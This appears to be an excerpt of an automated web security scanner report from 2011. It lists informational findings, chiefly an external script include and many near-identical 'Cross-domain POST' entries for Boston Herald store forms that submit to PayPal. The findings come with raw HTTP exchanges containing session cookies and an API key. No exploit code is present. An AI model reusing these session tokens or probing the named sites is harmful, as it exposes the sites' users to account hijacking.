Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWIwY2I0NTRjZDQ3ZjE0OGEzM2Y0M2Y1NGRmODliYjE0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIbcgDzS0B--2194c1bcafd7074cfe955b90c9396e96ed9331c5; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 49593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">


<script type="text/javascript">
//<![CDATA[
(function(g){var a=location.href.split("#!")[1];if(a){window.location.hash = "";g.location.pathname = g.HBR = a.replace(/^([^/])/,"/$1");}})(window);
//]]>
</script>
<script type="text/javascript" charset="utf-8">
if (!twttr) {
var twttr = {}
}

// Benchmarking load time.
// twttr.timeTillReadyUnique = '1296182070-32644-55879';
// twttr.timeTillReadyStart = new Date().getTime();
</script>

<script type="text/javascript">
//<![CDATA[
var page={};var onCondition=function(D,C,A,B){D=D;A=A?Math.min(A,5):5;B=B||100;if(D()){C()}else{if(A>1){setTimeout(function(){onCondition(D,C,A-1,B)},B)}}};
//]]>
</script>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="en-us" http-equiv="Content-Language" />
<meta content="Mike Alsup (malsup) is on Twitter. Sign up for Twitter to follow Mike Alsup (malsup) and get their latest updates" name="description" />
<meta content="no" http-equiv="imagetoolbar" />
<meta content="width = 780" name="viewport" />
<meta content="4FTTxY4uvo0RZTMQqIyhh18HsepyJOctQ+XTOu1zsfE=" name="verify-v1" />
<meta content="1" name="page" />
<meta content="NOODP" name="robots" />
<meta content="n" name="session-logg
...[SNIP]...

14.6. http://www.screenthumbs.com/tools/js/linkthumbs.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.screenthumbs.com
Path:   /tools/js/linkthumbs.js

Request 1

GET /tools/js/linkthumbs.js?key=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthome HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Referer: http://www.screenthumbs.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

var linkthumbs_url = 'http://www.screenthumbs.com/thumb?direct=1&appkey=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthome&format=0&width=200&height=150&url=';

var linkthumbs_clsNames = ['', 'type2'];
var linkthumbs_previewTypes = [0, 1];
var linkthumbs_delays = [0, 0];

var linkthumbs_iconWidth = 16;
var linkthumbs_iconHeight = 16;
var linkthumbs_iconURL = 'http://www.screenthumbs.com/tools/images/icon4.png';

var linkthumbs_mouseX = 0, linkthumbs_mouseY = 0;
var linkthumbs_currentThumbIndex = -1;
var linkthumbs_containerTimeout = -1;
var linkthumbs_dummyEnabled = false;
var linkthumbs_fadeTimeout = -1;
var linkthumbs_showThumbTimeout = -1;
var linkthumbs_currentOpacity = 0;
var linkthumbs_opacityStep = 15;

var linkthumbs_thumb = null;
var linkthumbs_container = null;
var linkthumbs_dummyThumb = null;

var linkthumbs_iconTimeouts = new Array();
var linkthumbs_thumbs = new Array();
var linkthumbs_icons = Array();

var linkthumbs_dummyThumbURL = '';
var linkthumbs_ie = false;

function linkthumbs_detectIE()
{
if(navigator && navigator.userAgent)
{
var userAgent = navigator.userAgent.toLowerCase();

if(userAgent.indexOf('msie') >= 0)
{
linkthumbs_ie = true;
linkthumbs_opacityStep = 0;
}
}
}

function linkthumbs_setOpacity(element, opacity)
{
if(element)
{
element.style.filter = 'alpha(opacity=' + opacity + ')';
element.style.mozOpacity = opacity / 100;
element.style.opacity = opacity / 100;
}
}

function linkthumbs_changeOpacity()
{
linkthumbs_currentOpacity += linkthumbs_opacityStep;
var display = false;

if(linkthumbs_currentOpacity <= 0)
{
linkthumbs_currentOpacity = 0;
linkthumbs_container.style.display = 'none';
linkthumbs_container._isVisible = false;
window.clearInterval(linkthumbs_fadeTimeout);
linkthumbs_fadeTimeout
...[SNIP]...

Request 2

GET /tools/js/linkthumbs.js?key=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthome HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

//Restricted Access

15. Cross-domain POST
There are 20 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


15.1. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jul070809.gif" width="104" height="111">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

15.2. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img height="167" src="images/Oct312007.jpg" align"right">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

15.3. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
</p>
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="hidden" name="cmd" value="_cart">
...[SNIP]...

15.4. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune13.gif">
   
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

15.5. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune18c.gif">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

15.6. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/images/siteImages/universal/championsBuyNow.gif">
Champions: A Herald Media 64-page full color publication
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

15.7. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img height="167" src="http://bh.heraldinteractive.com/store/images/superSweet.jpg">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

15.8. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/20100120.jpg" width="104" height="111">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

15.9. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<br>
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

15.10. http://www.bostonherald.com/store/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
